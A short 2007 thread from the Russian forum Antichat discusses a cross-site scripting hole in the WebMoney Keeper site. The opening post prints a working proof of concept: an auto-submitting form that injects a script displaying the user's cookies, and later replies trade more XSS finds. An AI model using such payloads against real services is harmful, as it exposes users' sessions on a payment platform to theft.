Форум АНТИЧАТ - XSS на keeper.webmoney.ru ;)

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - XSS на keeper.webmoney.ru ;) (https://forum.antichat.xyz/showthread.php?t=32728)

omg!	04.02.2007 22:39

XSS на keeper.webmoney.ru ;)

нашел случайно - в страничках кипера увидел закоментенный блок с линком на тестовую страницу:

<form action="http://keeper.webmoney.ru/docs/test.asp" METHOD="post">
<input type=hidden name='XSS' value='<script>alert(document.cookie + "\nXSS by KPbIC(myiworm@mail.ru)")</script>'>
</form>
<script>document.forms[0].submit();</script>

tclover

04.02.2007 22:43

линк на страничку покаж

omg!	04.02.2007 22:45

http://forum.zloy.org/showthread.php?t=24296

тут афтар отписался об XSS

Gh0s7

04.02.2007 22:48

хссы на пост - тру, единственное, от них толку нет)
Кста, me тожел нашел хсс в посте, кому линк надо?)

Время: 03:43